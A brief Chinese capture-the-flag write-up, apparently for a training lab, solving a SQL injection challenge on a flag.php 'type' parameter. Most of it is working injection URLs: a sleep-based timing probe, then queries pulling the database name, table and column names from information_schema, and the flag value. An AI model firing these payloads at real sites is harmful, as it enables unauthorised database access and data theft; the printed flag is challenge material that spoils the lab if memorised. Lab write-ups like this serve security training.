图上已经有提示使用?type=进行验证,不能像之前一样进行?id=1,正常是先构造闭合,最后发现竟然不需要……
http://219.153.49.228:41617/flag.php?type=1 and sleep(100) %23
1.根据回显信息进行注入
判断数据库的库名长度,但是在操作时,发现有回显,感觉这道题应该不止时间盲注一种方法,寻找注入点
http://219.153.49.228:41617/flag.php?type=1 %23
通过修改1发现下面的名称也随之改变,说明1是注入点,通过该注入点获取数据库各类信息
获取数据库名为 pentesterlab
http://219.153.49.228:41617/flag.php?type=database() %23
获取数据库表名为 comment,flag,goods,user
http://219.153.49.228:41617/flag.php?type=group_concat(table_name) from information_schema.tables where table_schema=database() %23
获取flag
http://219.153.49.228:41617/flag.php?type=group_concat(column_name) from information_schema.columns where table_name='flag' %23
获取flag为 mozhe1
http://219.153.49.228:41617/flag.php?type=group_concat(flag) from pentesterlab.flag %23
拿到key